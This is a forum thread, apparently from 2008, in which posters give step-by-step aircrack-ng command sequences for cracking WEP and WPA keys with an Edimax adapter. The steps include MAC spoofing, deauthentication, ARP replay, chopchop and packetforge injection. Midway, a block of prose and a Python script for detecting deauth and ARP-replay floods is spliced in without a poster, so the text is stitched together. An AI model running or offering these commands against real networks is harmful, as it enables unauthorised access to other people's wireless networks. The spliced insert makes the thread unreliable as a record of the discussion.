Using the Edimax 7318USg w/ Aircrack-ng


0tt0v0nc4t
07-03-2008, 03:21 PM
Hello,
I have another thread discussing some problems we have been experiencing with the Edimax 7318USg (http://forums.remote-exploit.org/showthread.php?t=14720). Some people are having a hard time getting the card to inject from the command line, and since this isn't a problem I have had, I thought I would document what works for me here.

There are three things I want to make very clear before I begin.
First - This is just a compressed version of one of Xploits' tutorials. I watched his videos like everyone else and made a txt file with the commands that were used because my memory is terrible. If there are any thanks to be had please remember Xploits as well.

Second- I am still very new to Linux and cannot offer much troubleshooting. If this doesn't work for you, I will most likely not know why. This is just what works for me, I'm still learning just like most of you. ;)

3rd - Any commands inside of the <> symbols are variables. In other words it's up to you to configure the information as needed. I have color coded the commands below as a reference in an attempt to avoid confusion.
<mac> - MAC address of the AP
<yourmac> - MAC address of your card
<channel> - Channel of the AP
<output> - Name it anything you want


Configure card

modprobe -r rt73 (unload driver)

modprobe rt73 (load driver)

ifconfig rausb0 up (interface up)

iwconfig rausb0 rate 1M (Lower card rate to 1MB)

WEP

airodump-ng rausb0 (Scans SSID's)

airodump-ng -c <channel> -w <output> --bssid <mac> rausb0 (target SSID)

aireplay-ng -1 0 -a <mac> -h <yourmac> rausb0 (authenticate)

aireplay-ng -3 -b <mac> -h <yourmac> rausb0 (inject IV's)

aircrack-ng -n 128 <output>*.cap (crack wep)

WPA

airodump-ng rausb0 (Scans SSID's)

airodump-ng -c <channel> -w <output> --bssid <mac> rausb0 (target SSID)

aireplay-ng -0 1 -a <mac> -c <yourmac> rausb0 (De Auth)

aircrack-ng -w password.lst <output>*.cap

Hope this helps, good luck.

=Tron=
07-03-2008, 03:35 PM
Nice compact tutorial that can be used as reference by people new to the aircrack-ng suite. However the command in airodump-ng to be used to specify the SSID is -e and not -w (write) which you can label as you like as it only determines the prefix of the cap file. I understand that this is most likely what you mean, but as you write that the SSID should come after the -w option it can be confusing for people not familiar with the program.

Also you should probably write out that after the --bssid comes the AP's MAC and not the MAC address of your wireless card. And it would be a good idea to change the aircrack-ng command from <ssid>-01.cap to <ssid>*.cap so that all appropriate cap files will be used in case there are several.

0tt0v0nc4t
07-03-2008, 03:45 PM
Thank you very much. You're right, I wasn't thinking that a lot of these are my own personal notes and some of them may need explaining. It's definitely something to remember for future how-tos and I will fix it now. :D

=Tron=
07-03-2008, 04:17 PM
Looks much clearer now and I am sure that you will receive fewer questions about the commands in their new form.

Just the wild-card missing from <output>.cap now ;)
<output>*.cap

bofh28
07-03-2008, 09:20 PM
Good tutorial. You might want to add that for WPA to be cracked the password must be in the password.lst. I never had the -3 attack (ARP request replay attack) work for me. I always ended up doing a -4 attack (KoreK chopchop attack):
<mac> - MAC address of the AP
<channel> - Channel of the AP
<output> - Name it anything you want

# airmon-ng stop rausb0
# ifconfig rausb0 down
# macchanger --mac 00:11:22:33:44:55 rausb0
# airmon-ng start rausb0
# airodump-ng rausb0
find the bssid and ctrl-c out
# airodump-ng -c <channel> -w <output> --bssid <mac> rausb0
open a second xterm
# aireplay-ng -1 0 -a <mac> -h 00:11:22:33:44:55 rausb0
or
# aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a <mac> -h 00:11:22:33:44:55 rausb0
and it should successfully associate. Use only one of the two above commands. Sometimes one won't work.
# aireplay-ng -4 -b <mac> -h 00:11:22:33:44:55 rausb0
answer yes and wait
# packetforge-ng --arp -a <mac> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y <output>.xor -w arprequest
# aireplay-ng -2 -r arprequest rausb0
say yes
switch to first xterm and watch data climb
open third xterm and
# aircrack-ng <output>*.cap

=Tron=
07-04-2008, 02:19 AM
The ARP-replay attack is the most basic of the available ones and will work with every AP and card that supports injection. The only thing one must make sure of is that there is some actual traffic going on between the AP and an additional client. If there are no clients currently connected to the AP no ARP requests will be sent and therefore naturally none will be intercepted by aireplay-ng.
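The deauthentication step in the first post and the ARP-request replay that Tron explains here both leave a distinctive footprint on the air, which is what a wireless IDS looks for. The following is an added example, not code from this thread: it runs two simple burst detectors over a constructed sample of 802.11 frame metadata (the addresses, timings and thresholds are assumptions) and flags deauth floods aimed at a client and floods of identical-length data frames from a single station.

```python
from collections import defaultdict

# Constructed sample of frame metadata, as a monitor-mode sniffer might log it:
# (time_s, subtype, src, dst, bssid, frame_length). Addresses are made up.
AP = "00:14:6c:7e:40:80"
CLIENT = "00:0f:b5:ab:cb:9d"
ATTACKER = "00:11:22:33:44:55"

SAMPLE_FRAMES = (
    [(0.0, "beacon", AP, "ff:ff:ff:ff:ff:ff", AP, 110)]
    # a deauth burst: 64 frames spoofing the AP, all at one client
    + [(0.01 * i, "deauth", AP, CLIENT, AP, 26) for i in range(1, 65)]
    # an injected ARP-request replay: hundreds of same-size frames from one station
    + [(1.0 + 0.002 * i, "data", ATTACKER, AP, AP, 68) for i in range(600)]
    # ordinary client traffic: slow and with varying frame sizes
    + [(5.0 + 0.5 * i, "data", CLIENT, AP, AP, 90 + i % 40) for i in range(10)]
)


def _bursts(events, window, threshold):
    """Return the keys whose timestamp lists contain more than `threshold`
    events inside any span of `window` seconds (sliding-window count)."""
    hits = set()
    for key, times in events.items():
        times = sorted(times)
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:   # slide the window start forward
                lo += 1
            if hi - lo + 1 > threshold:
                hits.add(key)
                break
    return hits


def detect_deauth_burst(frames, window=1.0, threshold=10):
    """Flag (bssid, victim) pairs hit by a burst of deauthentication frames.
    A single aireplay-ng -0 count already sends dozens of them."""
    events = defaultdict(list)
    for t, subtype, _src, dst, bssid, _length in frames:
        if subtype == "deauth":
            events[(bssid, dst)].append(t)
    return _bursts(events, window, threshold)


def detect_arp_replay(frames, window=1.0, threshold=200):
    """Flag (bssid, station, length) triples where one station pushes a flood of
    identical-length data frames, the signature of a replayed ARP request."""
    events = defaultdict(list)
    for t, subtype, src, _dst, bssid, length in frames:
        if subtype == "data":
            events[(bssid, src, length)].append(t)
    return _bursts(events, window, threshold)
```

Thresholds here are illustrative; on a real network tune them against a baseline of the AP's normal deauth and data rates before alerting.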

buns234k
09-02-2008, 08:49 PM
I'm having a little problem.

ifconfig rausb0 down

modprobe -r rt73
lzm2dir kernel.lzm
modprobe rt73

ifconfig rausb0 up

All works great up to here, then after changing my MAC address like this:

# airmon-ng stop rausb0
# ifconfig rausb0 down
# macchanger --mac 00:11:22:33:44:55 rausb0
# airmon-ng start rausb0
# airodump-ng rausb0

I open Kismet or Wireless Assistant and it doesn't show any wifis :( How come?

And it's strange because it doesn't pick any up after I change my MAC address, so does anyone know why?

0tt0v0nc4t
09-05-2008, 02:46 PM
From what you have posted, your lzm2dir command is missing a /

Try using
lzm2dir kernel.lzm /
and don't forget to include the space before the /

Also, have you gotten the kernel.lzm and the latest or previous rt73 driver? These do not come with the CD and need to be downloaded. If you just used the lzm2dir kernel.lzm command (with or without the /) without having the kernel.lzm then it would have no effect. Good luck.